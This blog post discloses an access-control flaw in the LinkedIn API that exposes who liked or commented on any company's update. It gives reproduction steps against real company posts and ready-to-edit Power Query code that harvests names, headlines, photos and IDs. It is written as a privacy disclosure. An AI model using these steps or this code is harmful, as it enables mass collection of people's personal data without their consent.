Inspired by the big news that Microsoft is about to acquire LinkedIn here, and due to my past history as a privacy and security advocate in Microsoft Excel team, I thought it would be important to share with you a privacy bug in LinkedIn API and a possible violation to section 2.13 of their Privacy Policy here.
According to section 2.13 of LinkedIn privacy policy: “Companies and other entities can create pages on our Services. If you follow one of these pages, non-identifiable information about you will be provided to the page’s administrators.“. Well, today I will show you how any person and (not only administrators) can automatically extract such data, and potentially “harvest” user profiles by their engagements in any company pages.
I found this bug while I was working on this blog post. I wanted to share it with you today, after a recent response from LinkedIn, stating that the issue is an expected behavior, and not a bug.
So LinkedIn and I can agree to disagree. I still think that the issue that I will share with you in a minute is a bug, and IMHO a serious one as it allows hackers to extract data about LinkedIn users who liked or commented on ANY company’s specific update via the LinkedIn API and without the company’s permissions.
For example, here is a screenshot from an Excel workbook that takes advantage of the specific bug to extracts from LinkedIn 100 personal names, their professional headline, and LinkedIn object ID that can lead to additional personal data such as their location.
The hundred users above liked a specific Microsoft status update on LinkedIn (these are 100 users out of a total 2769 users who liked the specific update below). The status update below was arbitrarily selected. You can extract this information from any other company update on LinkedIn.
Now, as you can imagine, I don’t have any access as an administrator to Microsoft company page, so it seems “unfair” to allow me to read this data, or even worse, to allow potential abuse of such data by the company’s competitors or hackers.
You may argue, that this data should be public to anyone, as it is public to users who browse company pages in LinkedIn, but I will show you below a proof that LinkedIn intended to block this data from users who are not company page administrators.
As for company adminsitrators, it does make sense to allow them to extract such data to monitor engagement and to learn more about their audience. But right now, with the bug I will share with you, anyone can use a fake company in LinkedIn and “harvest” users by their likes and comments on companies’ updates.
Now let’s drill down to the bug itself.
The following API call can be used with any legitimate or fake company ID on any company’s specific update:
https://api.linkedin.com/v1/companies/ [Any company ID that you own as an administartor, can be a fake company]/updates/ key=UPDATE-c1337-[Any status ID of any company you wish to ]?format=json
As mentioned above, the response to this API call includes 100 records of personal names, professional headlines, picture URLs and object IDs of users who liked or commented on the specific status update. With the LinkedIn object IDs, you can extract additional information from LinkedIn, like user location.
Here are easy steps to reproduce the bug:
- Make sure you are an administrator of a company page in LinkedIn.
- Open LinkedIn API Console here
- Sign in with your LinkedIn profile by selecting OAuth 2 in the Authentication drop down menu.
- Click on List all companies that the member is an administrator… (highlighted by the first red rectangle below).
- Click the Send button (highlighted by the second red rectangle below).
- Copy your company ID (highlighted by the third red rectangle below).
- Click on Get a specific company update link (highlighted below), and click the Send button.
- You will notice a HTTP/1.1 403 Forbidden error in the Response pane (see screenshot below). This is the expected behavior, as you are not the administrator of the company page whose ID is 1337 (The console used the company ID 1337 by default).
Note: To me, the error message in following screenshot may prove that LinkedIn originally intended to block this API call when the caller is not the company’s administrator. The message clearly states: “Member does not have permission to get company“.
- Now, and here is the bug: Change the URL in the Request URL box, and replace the company number 1337 with your company ID that was retrieved in the previous steps above, and click the Send button.
For example: In the original URL we have company ID 1337: https://api.linkedin.com/v1/companies/1337/updates/key=UPDATE-c1337-5986518397255454720?format=json
In the modified URL, I used DataChant Object ID: https://api.linkedin.com/v1/companies/10376695/updates/key=UPDATE-c1337-5986518397255454720?format=json
- In the Response pane you will see the engagement data for a specific post whose ID is 5986518397255454720 (This post ID was auto-populated by the API console).
- If you want to extract data on other companies, find the relevant company in LinkedIn, let’s choose Coca-Cola as an example.
- Open Coca-Cola page with your browser here.
- Select a specific update, right click on the link Share, and open the link in new tab.
- In your browser, go to the new tab that was opened at the previous step and copy the numerical value of activityId (marked in red rectangle in the screenshot below).
- Back to the API console, paste the activityId number you copied at the previous step into the URL in the Requested URL box.
For example: The URL before the last step was: https://api.linkedin.com/v1/companies/10376695/updates/key=UPDATE-c1337-5986518397255454720?format=json
The new URL after this step will be: https://api.linkedin.com/v1/companies/10376695/updates/key=UPDATE-c1337-6139457523029196800?format=json
- In the API Console click the Send button.
- Now you can see in the Response pane data on persons who liked or commented on a specific company page update of Coca-Cola.
Conclusions:
As described above, a programmer or advanced Excel user (following my blog here) can write a tool that will automatically extract data about LinkedIn users, based on their engagement on targeted company pages.
The steps that I demonstrated above can be easily automated and be exploited by hacker who can build large datasets of user profiles by specific engagements to specific companies, and sell this data to cybercrime organizations. In addition, Companies can take advantage of this information on the expanse of users’ privacy and trust at LinkedIn and create automatic tools that will harvest data on their competitors’ audience.
Finally, here is the Power Query M expression that can be used to extract the data to Excel or Power BI.
After you paste the code into the Advanced Editor, don’t forget to change yourCompanyId to your LinkedIn company ID (Find above how to get that ID).
After you refresh the query, you will need to insert LinkedIn access token to the relevant dialog in Excel or Power BI, to obtain a token you can use LinkedIn API Console, as described in my blog post here.
let yourCompanyId = 10376695, // Change this number to your own company's ID statusId = 6139457523029196800, // This is Coca-Cola status update. // You can change a status ID of any status you wish to retrieve by ANY company url = "https://api.linkedin.com/v1/companies/" & yourCompanyId & "/updates/key=UPDATE-c1337-" & statusId & "?format=json", Source = Json.Document( Web.Contents(url, [ApiKeyName="oauth2_access_token", Query=[format="json"]])), likes = Source[likes], values = likes[values], #"Converted to Table" = Table.FromList( values, Splitter.SplitByNothing(), null, null, ExtraValues.Error), #"Expanded Column1" = Table.ExpandRecordColumn( #"Converted to Table", "Column1", {"person", "timestamp"}, {"Column1.person", "Column1.timestamp"}), #"Expanded Column1.person" = Table.ExpandRecordColumn( #"Expanded Column1", "Column1.person", {"firstName", "headline", "id", "lastName", "pictureUrl"}, {"Column1.person.firstName", "Column1.person.headline", "Column1.person.id", "Column1.person.lastName", "Column1.person.pictureUrl"}), #"Reordered Columns" = Table.ReorderColumns( #"Expanded Column1.person",{"Column1.person.firstName", "Column1.person.lastName", "Column1.person.headline", "Column1.person.id", "Column1.person.pictureUrl", "Column1.timestamp"}), #"Renamed Columns" = Table.RenameColumns( #"Reordered Columns",{{"Column1.person.firstName", "First Name"}, {"Column1.person.lastName", "Last Name"}, {"Column1.person.headline", "Headline"}, {"Column1.person.id", "Object ID"}, {"Column1.person.pictureUrl", "Picture URL"}}), #"Removed Columns" = Table.RemoveColumns( #"Renamed Columns",{"Column1.timestamp"}) in #"Removed Columns"
Disclaimer: As LinkedIn Security team received this issue by email and responded back with a statement that this behavior is not a bug, I can share this issue with you to raise awareness on user privacy and to encourage you to use the information above for learning purposes only. The author of this article takes no responsibility for any outcome or wrong use of this information.